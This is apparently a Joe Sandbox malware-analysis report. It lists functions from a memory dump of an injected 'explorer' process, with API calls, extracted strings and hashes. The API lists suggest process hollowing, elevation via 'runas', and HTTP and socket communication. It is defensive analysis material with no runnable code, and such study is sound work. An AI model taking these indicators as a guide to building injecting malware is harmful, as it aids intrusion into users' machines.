                          • String ID: %s%s$2$SOFTWARE\%s$Software\%s$Software\%s$Software\%s$Spotify.exe$h${2046C745-B848-47EE-8068-B039EAC15A1C}${29C72B9F-C97F-4A3E-B2AD-47E00C9D4930}${7EE6EBB8-7FBC-4C3E-AAB8-F5FE9571F428}${A25A8DA7-6938-4CAB-8D05-4B8A4D0816BC}${F711BB4E-52A0-4F2C-BD3A-54EB0B2E6079}
                          • API String ID: 2965556141-3169802617
                          • Opcode ID: 16e865494beb0c0552abcd8ac02d39e7152076fd49e31f46be9424e4a944fc86
                          • Instruction ID: 9c9495f28ff33522d172e395a5a1829b91d87b88bacb6142b11d9f0ea8669b3f
                          • Opcode Fuzzy Hash: 16e865494beb0c0552abcd8ac02d39e7152076fd49e31f46be9424e4a944fc86
                          • Instruction Fuzzy Hash: 27321572219AC595EB75DF14F8887DAB3A5F788758F800126D68D83B68EF7CC249CB40
                          Function 0119E8C0 Relevance: 93.0, APIs: 43, Strings: 10, Instructions: 213stringCOMMON
                          Download Yara Rule
                          APIs
                          • GetCommandLineW.KERNEL32 ref: 0119E8C7
                          • CommandLineToArgvW.SHELL32 ref: 0119E8DC
                          • lstrcmpiW.KERNEL32 ref: 0119E8F7
                          • lstrcmpiW.KERNEL32 ref: 0119E91D
                            • Part of subcall function 01195AD0: GetModuleFileNameW.KERNEL32 ref: 01195AFE
                            • Part of subcall function 01195AD0: _LDint.LIBCPMTD ref: 01195B15
                            • Part of subcall function 01195AD0: CreateFileW.KERNEL32 ref: 01195B93
                            • Part of subcall function 01195AD0: WriteFile.KERNEL32 ref: 01195BF0
                            • Part of subcall function 01195AD0: CloseHandle.KERNEL32 ref: 01195C13
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.3291508536.0000000001191000.00000020.00001000.00020000.00000000.sdmp, Offset: 01190000, based on PE: true
                          • Associated: 00000003.00000002.3291495277.0000000001190000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291531649.00000000011C8000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011D4000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011ED000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011EF000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011F9000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291611655.00000000011FD000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1190000_explorer.jbxd
                          Yara matches
                          Similarity
                          • API ID: File$CommandLinelstrcmpi$ArgvCloseCreateDintHandleModuleNameWrite
                          • String ID: shellcode${094CBDBD-CA58-4DF6-999A-7FCC415A528A}${0F0641A2-3ABD-446F-81C5-65FC68B7C330}${1C8F1E61-D31A-4DE2-A46A-E1D82FC75222}${4002ADAA-2323-44A5-9F39-80B79D7023EC}${669627E2-6B39-4990-B906-8786734FF1DD}${72A3B189-93CE-456F-B494-1FB1DB2DA359}${8BF89F76-FE32-4DAA-9B54-D6ACD7227894}${A44FB1B8-C69C-4CA5-B3EE-4AE5C96B528F}${BBD69D41-7ECF-4B3B-8592-7E70DE12B303}
                          • API String ID: 3070626111-1066670274
                          • Opcode ID: 3127917cb21087ce76972a75fedb307400ad31297a52c85d84f0972bdcbee6c9
                          • Instruction ID: 006275480f0de491ab6a7862712b8f6f563df941517fb7f3eca209ed215f3563
                          • Opcode Fuzzy Hash: 3127917cb21087ce76972a75fedb307400ad31297a52c85d84f0972bdcbee6c9
                          • Instruction Fuzzy Hash: 04B1FB31205E8482EB5CEF29E8443DA67A1F788B95F444139E79B876B4DF7CC48ACB41
                          Function 0119A3B0 Relevance: 68.5, APIs: 29, Strings: 10, Instructions: 205memorystringprocessCOMMON
                          Download Yara Rule
                          APIs
                          • setsockopt.WS2_32 ref: 0119A460
                          • SetEvent.KERNEL32 ref: 0119A4CF
                          • LocalAlloc.KERNEL32 ref: 0119A50A
                          • wnsprintfW.SHLWAPI ref: 0119A54F
                          • LocalAlloc.KERNEL32 ref: 0119A55F
                          • lstrcpyW.KERNEL32 ref: 0119A58C
                          • LocalAlloc.KERNEL32 ref: 0119A5B5
                          • lstrcpyW.KERNEL32 ref: 0119A5E1
                          • CoInitializeEx.COMBASE ref: 0119A660
                          • ShellExecuteExW.SHELL32 ref: 0119A675
                          • GetLastError.KERNEL32 ref: 0119A682
                          • CoUninitialize.COMBASE ref: 0119A699
                          • LocalAlloc.KERNEL32 ref: 0119A6E2
                          • wnsprintfW.SHLWAPI ref: 0119A733
                          • CreateProcessW.KERNEL32 ref: 0119A7A2
                          • OpenEventW.KERNEL32 ref: 0119A7C7
                          • SetEvent.KERNEL32 ref: 0119A7E8
                          • CloseHandle.KERNEL32 ref: 0119A7F6
                          • LocalFree.KERNEL32 ref: 0119A804
                          • LocalFree.KERNEL32 ref: 0119A812
                          • OpenEventW.KERNEL32 ref: 0119A828
                          • SetEvent.KERNEL32 ref: 0119A849
                          • CloseHandle.KERNEL32 ref: 0119A857
                          • LocalFree.KERNEL32 ref: 0119A865
                          • LocalFree.KERNEL32 ref: 0119A873
                          • LocalFree.KERNEL32 ref: 0119A881
                          • LocalFree.KERNEL32 ref: 0119A88F
                          • shutdown.WS2_32 ref: 0119A89F
                          • closesocket.WS2_32 ref: 0119A8AA
                            • Part of subcall function 0119FBA0: CreateDirectoryW.KERNEL32 ref: 0119FBD8
                            • Part of subcall function 0119FBA0: GetLastError.KERNEL32 ref: 0119FBE3
                            • Part of subcall function 0119FBA0: LocalAlloc.KERNEL32 ref: 0119FBFE
                            • Part of subcall function 0119FBA0: CreateFileW.KERNEL32 ref: 0119FC6E
                            • Part of subcall function 0119FBA0: GetLastError.KERNEL32 ref: 0119FC79
                            • Part of subcall function 0119FBA0: LocalFree.KERNEL32 ref: 0119FD16
                            • Part of subcall function 0119FBA0: LocalFree.KERNEL32 ref: 0119FD21
                            • Part of subcall function 0119F510: SHGetKnownFolderPath.SHELL32 ref: 0119F587
                            • Part of subcall function 0119F510: lstrlenW.KERNEL32 ref: 0119F59A
                            • Part of subcall function 0119F510: lstrlenW.KERNEL32 ref: 0119F5B5
                            • Part of subcall function 0119F510: LocalAlloc.KERNEL32 ref: 0119F5DC
                            • Part of subcall function 0119F510: lstrlenW.KERNEL32 ref: 0119F620
                            • Part of subcall function 0119F510: CoTaskMemFree.COMBASE ref: 0119F635
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.3291508536.0000000001191000.00000020.00001000.00020000.00000000.sdmp, Offset: 01190000, based on PE: true
                          • Associated: 00000003.00000002.3291495277.0000000001190000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291531649.00000000011C8000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011D4000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011ED000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011EF000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011F9000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291611655.00000000011FD000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1190000_explorer.jbxd
                          Yara matches
                          Similarity
                          • API ID: Local$Free$Alloc$Event$CreateErrorLastlstrlen$CloseHandleOpenlstrcpywnsprintf$DirectoryExecuteFileFolderInitializeKnownPathProcessShellTaskUninitializeclosesocketsetsockoptshutdown
                          • String ID: "%s%s"$"%s%s" %s$@@$Spotify.exe$h$p$runas${29C72B9F-C97F-4A3E-B2AD-47E00C9D4930}${8BF89F76-FE32-4DAA-9B54-D6ACD7227894}${A44FB1B8-C69C-4CA5-B3EE-4AE5C96B528F}
                          • API String ID: 852330099-1461230316
                          • Opcode ID: 9fdb54751ab223528b477e0356fa8e77d3d1709116a267faf5ee03a62359e9d4
                          • Instruction ID: 92184b23f463e4af59921ff9a0ea1eef1c8d79052083d652d5c04cc0f4d71c92
                          • Opcode Fuzzy Hash: 9fdb54751ab223528b477e0356fa8e77d3d1709116a267faf5ee03a62359e9d4
                          • Instruction Fuzzy Hash: EEC1B436208B8586EB799F14F4983DAB3A1F788755F50412ADB9E47B68DF7CC089CB40
                          Function 01197940 Relevance: 51.0, APIs: 26, Strings: 3, Instructions: 228nativethreadprocessCOMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.3291508536.0000000001191000.00000020.00001000.00020000.00000000.sdmp, Offset: 01190000, based on PE: true
                          • Associated: 00000003.00000002.3291495277.0000000001190000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291531649.00000000011C8000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011D4000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011ED000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011EF000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011F9000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291611655.00000000011FD000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1190000_explorer.jbxd
                          Yara matches
                          Similarity
                          • API ID: Section$View$CloseUnmap$Process$CreateCurrentThread$ContextHandle$ResumeTerminate
                          • String ID: @$@$h
                          • API String ID: 2911138354-1939477041
                          • Opcode ID: 8b9736486d1c1bb18502a02d052894d07546cc1a1eb466c729bb3f1f531f4655
                          • Instruction ID: 88b892271f903a968db1b7649dcc384ff0003fd423cc6251cb810ae5bb2662ef
                          • Opcode Fuzzy Hash: 8b9736486d1c1bb18502a02d052894d07546cc1a1eb466c729bb3f1f531f4655
                          • Instruction Fuzzy Hash: 47D19C76118AC486E764DB15F4983DAB7A1F7C8798F004129EB8A83B68DF7DC499CF40
                          Function 011BF964 Relevance: 40.7, APIs: 22, Strings: 1, Instructions: 465COMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.3291508536.0000000001191000.00000020.00001000.00020000.00000000.sdmp, Offset: 01190000, based on PE: true
                          • Associated: 00000003.00000002.3291495277.0000000001190000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291531649.00000000011C8000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011D4000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011ED000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011EF000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011F9000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291611655.00000000011FD000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1190000_explorer.jbxd
                          Yara matches
                          Similarity
                          • API ID: __doserrno_errno_invalid_parameter_noinfo
                          • String ID: U
                          • API String ID: 3902385426-4171548499
                          • Opcode ID: 8f6b26654e27598fab1e916dcbf4c9cba279a53099fc561579a7e683be8f4827
                          • Instruction ID: 44a0304da33c6dc462b67f901bf5f259d42d849a7e809986802eb8c354b9a0cd
                          • Opcode Fuzzy Hash: 8f6b26654e27598fab1e916dcbf4c9cba279a53099fc561579a7e683be8f4827
                          • Instruction Fuzzy Hash: D6022733304A8686EB289F29E8C47EEB761F799B84F55011AEF4A47758DB3DC046CB40
                          Function 011AD030 Relevance: 38.7, APIs: 21, Strings: 1, Instructions: 182synchronizationCOMMON
                          Download Yara Rule
                          APIs
                          Strings
                          • Mozilla/5.0 (Windows NT 6.1; WOW64; rv:64.0) Gecko/20100101 Firefox/64.0, xrefs: 011AD0D8
                          Memory Dump Source
                          • Source File: 00000003.00000002.3291508536.0000000001191000.00000020.00001000.00020000.00000000.sdmp, Offset: 01190000, based on PE: true
                          • Associated: 00000003.00000002.3291495277.0000000001190000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291531649.00000000011C8000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011D4000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011ED000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011EF000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011F9000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291611655.00000000011FD000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1190000_explorer.jbxd
                          Yara matches
                          Similarity
                          • API ID: CloseHandle$Create$EventFreeLocalMutex
                          • String ID: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:64.0) Gecko/20100101 Firefox/64.0
                          • API String ID: 4059844998-3593534564
                          • Opcode ID: 09c84e51a5f2523b42a324423d7d7ca560e18063558a9df129115e9e782c7eef
                          • Instruction ID: 3431d2b4c51be71dc411ea347d5448bec7971b03a6b879a09ba2682e7e9ce587
                          • Opcode Fuzzy Hash: 09c84e51a5f2523b42a324423d7d7ca560e18063558a9df129115e9e782c7eef
                          • Instruction Fuzzy Hash: 94A12B39208F9582EB6CDB65F8547DA67A5FB80754F80423AE79D43AA4DF3DC486CB00
                          Function 01194DA0 Relevance: 37.0, APIs: 15, Strings: 6, Instructions: 218filestringCOMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.3291508536.0000000001191000.00000020.00001000.00020000.00000000.sdmp, Offset: 01190000, based on PE: true
                          • Associated: 00000003.00000002.3291495277.0000000001190000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291531649.00000000011C8000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011D4000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011ED000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011EF000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011F9000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291611655.00000000011FD000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1190000_explorer.jbxd
                          Yara matches
                          Similarity
                          • API ID: CreateErrorLastPath$DirectoryFileFolderFreeKnownTaskTemplstrcpy
                          • String ID: "%s"$"%s" "%s"$%s\%s$%s\%s$Open$h
                          • API String ID: 1929679530-3531242659
                          • Opcode ID: cbe97f7d8983bdb2611ec03a94b5e63e71019160d72ef76e16489aa1337f778f
                          • Instruction ID: 53d02ea1af17275bd12fb4073f58f1779b77ec8c47826cd02617bbc5f4ccae15
                          • Opcode Fuzzy Hash: cbe97f7d8983bdb2611ec03a94b5e63e71019160d72ef76e16489aa1337f778f
                          • Instruction Fuzzy Hash: 54B13732218BC596EB78DF64E4883DAB7A2F784754F804226D69D83B98DF3CC519CB40
                          Function 011AAD50 Relevance: 35.2, APIs: 14, Strings: 6, Instructions: 245COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.3291508536.0000000001191000.00000020.00001000.00020000.00000000.sdmp, Offset: 01190000, based on PE: true
                          • Associated: 00000003.00000002.3291495277.0000000001190000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291531649.00000000011C8000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011D4000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011ED000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011EF000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011F9000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291611655.00000000011FD000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1190000_explorer.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: HEAD$NTDLL.DLL$RtlTimeToSecondsSince1970$application/octet-stream$h$text/plain
                          • API String ID: 0-2522958032
                          • Opcode ID: 046551e85585fe9dc31a01bf0e73871837a0d248a0eed496a8bb53954d6c9c8e
                          • Instruction ID: 2839f13eceb27ae04495f2baba6e07059930027d46a24f061f6665be305728af
                          • Opcode Fuzzy Hash: 046551e85585fe9dc31a01bf0e73871837a0d248a0eed496a8bb53954d6c9c8e
                          • Instruction Fuzzy Hash: 65D1E476218AC486E7799B54F4947DEBBA1F7C8744F80412ADB8A43A68DF7CC489CF40
                          Function 011AA510 Relevance: 31.8, APIs: 14, Strings: 4, Instructions: 334COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.3291508536.0000000001191000.00000020.00001000.00020000.00000000.sdmp, Offset: 01190000, based on PE: true
                          • Associated: 00000003.00000002.3291495277.0000000001190000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291531649.00000000011C8000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011D4000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011ED000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011EF000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011F9000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291611655.00000000011FD000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1190000_explorer.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: GET$application/octet-stream$h$text/plain
                          • API String ID: 0-3456709813
                          • Opcode ID: c8664ecd2ce9a1dc014cd3d8be18d4b3b9f4ddf8030916ce27af9d2bff062b64
                          • Instruction ID: 9968fd7468e0bfedd2ae88273173d87800b82e8584cf03b87b71d7b4c86cdb2c
                          • Opcode Fuzzy Hash: c8664ecd2ce9a1dc014cd3d8be18d4b3b9f4ddf8030916ce27af9d2bff062b64
                          • Instruction Fuzzy Hash: 5F02D376219BC486E7789B15F4947DABBA1F788744F80452AEB8A83B58DF3CC485CF40
                          Function 011997F0 Relevance: 31.6, APIs: 14, Strings: 4, Instructions: 146sleepfilestringCOMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.3291508536.0000000001191000.00000020.00001000.00020000.00000000.sdmp, Offset: 01190000, based on PE: true
                          • Associated: 00000003.00000002.3291495277.0000000001190000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291531649.00000000011C8000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011D4000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011ED000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011EF000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011F9000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291611655.00000000011FD000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1190000_explorer.jbxd
                          Yara matches
                          Similarity
                          • API ID: File$FindSleep$AttributesDirectoryRemove$CloseDeleteFirstFolderFreeKnownNextPathTask_errno_invalid_parameter_noinfolstrlen
                          • String ID: %s\%s$%s\*.*$%s\System32$\\?\%s
                          • API String ID: 3007324005-2457321626
                          • Opcode ID: b267a56e6ab7b9a000c922ea95a34f4d4a28f519d58c957bc6e25a78e90fa5e3
                          • Instruction ID: d1b2c0fd11a909284f6b9dd9e4c8a58f68fb0051b4ca820953922c77b92c7860
                          • Opcode Fuzzy Hash: b267a56e6ab7b9a000c922ea95a34f4d4a28f519d58c957bc6e25a78e90fa5e3
                          • Instruction Fuzzy Hash: 296168311189C9C6EB28DF24E8943DE73A1F7C4758F80452AD7AA87A98DF3DC555CB40
                          Function 011B5AD0 Relevance: 28.1, APIs: 14, Strings: 2, Instructions: 100librarymemoryloaderCOMMON
                          Download Yara Rule
                          APIs
                          • LocalAlloc.KERNEL32 ref: 011B5AE1
                          • LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,011B56ED), ref: 011B5AFF
                          • LocalFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,011B56ED), ref: 011B5B17
                          • GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,011B56ED), ref: 011B5B30
                          • LocalFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,011B56ED), ref: 011B5B48
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.3291508536.0000000001191000.00000020.00001000.00020000.00000000.sdmp, Offset: 01190000, based on PE: true
                          • Associated: 00000003.00000002.3291495277.0000000001190000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291531649.00000000011C8000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011D4000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011ED000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011EF000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011F9000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291611655.00000000011FD000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1190000_explorer.jbxd
                          Yara matches
                          Similarity
                          • API ID: Local$Free$AddressAllocLibraryLoadProc
                          • String ID: NTDLL.DLL$RtlGetVersion
                          • API String ID: 2539306102-196638859
                          • Opcode ID: 2a0aeae9c634e8d68b7f2cb2bba8257a7f840cb0e5baf0165ae7715a5647e2fc
                          • Instruction ID: 4a24589e8d57fdd519e54adc80e5f9a0b236af44d7ce1455afc75521486d66d2
                          • Opcode Fuzzy Hash: 2a0aeae9c634e8d68b7f2cb2bba8257a7f840cb0e5baf0165ae7715a5647e2fc
                          • Instruction Fuzzy Hash: 3051E576209A8886E768DF15E4947DA77A5F788B48F400629EB8E83768DF3CC545CF40
                          Function 011BE9BC Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 159fileCOMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          • _set_error_mode.LIBCMT ref: 011BEA01
                          • _set_error_mode.LIBCMT ref: 011BEA12
                          • GetModuleFileNameW.KERNEL32 ref: 011BEA74
                            • Part of subcall function 011BA964: GetCurrentProcess.KERNEL32(?,?,?,?,011BAA06), ref: 011BA97C
                          • GetStdHandle.KERNEL32 ref: 011BEB89
                          • WriteFile.KERNEL32 ref: 011BEBE6
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.3291508536.0000000001191000.00000020.00001000.00020000.00000000.sdmp, Offset: 01190000, based on PE: true
                          • Associated: 00000003.00000002.3291495277.0000000001190000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291531649.00000000011C8000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011D4000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011ED000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011EF000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011F9000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291611655.00000000011FD000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1190000_explorer.jbxd
                          Yara matches
                          Similarity
                          • API ID: File_set_error_mode$CurrentHandleModuleNameProcessWrite
                          • String ID: ...$<program name unknown>$Microsoft Visual C++ Runtime Library$Runtime Error!Program:
                          • API String ID: 2183313154-4022980321
                          • Opcode ID: ef2a5d33bd846243a7eab9aed687a3acfa5533d68f3e617418224947dace77c2
                          • Instruction ID: 174cd5a676763db885130b8717d44444b7ae97de636fb843f183b632e2c55d2a
                          • Opcode Fuzzy Hash: ef2a5d33bd846243a7eab9aed687a3acfa5533d68f3e617418224947dace77c2
                          • Instruction Fuzzy Hash: 8F51F23630579282EB2CDB39B9A47EA7356FB99B88F44412ADF5A43B54DF3CC106C640
                          Function 011A11A4 Relevance: 15.0, APIs: 10, Instructions: 32nativeCOMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000003.00000002.3291508536.0000000001191000.00000020.00001000.00020000.00000000.sdmp, Offset: 01190000, based on PE: true
                          • Associated: 00000003.00000002.3291495277.0000000001190000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291531649.00000000011C8000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011D4000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011ED000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011EF000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011F9000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291611655.00000000011FD000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1190000_explorer.jbxd
                          Yara matches
                          Similarity
                          • API ID: Close$HandleSectionUnmapView$ProcessTerminate
                          • String ID:
                          • API String ID: 4250251239-0
                          • Opcode ID: 4f910b99a22f92765c46a41be600696b4279f963f897c9c5538e65b4968240ee
                          • Instruction ID: a8a9b4acdcdaa365654ae465915b8cc4263ed6fce3928a61426e7298801910c7
                          • Opcode Fuzzy Hash: 4f910b99a22f92765c46a41be600696b4279f963f897c9c5538e65b4968240ee
                          • Instruction Fuzzy Hash: 60115C75515A8481DB68EF16F8543DE7361F7C8BA5F004026EB8E42A68CF7DC486CB00
                          Function 011C3B2C Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 288COMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.3291508536.0000000001191000.00000020.00001000.00020000.00000000.sdmp, Offset: 01190000, based on PE: true
                          • Associated: 00000003.00000002.3291495277.0000000001190000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291531649.00000000011C8000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011D4000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011ED000.00000004.00001000.00020000.00000000.sdmpDownload File
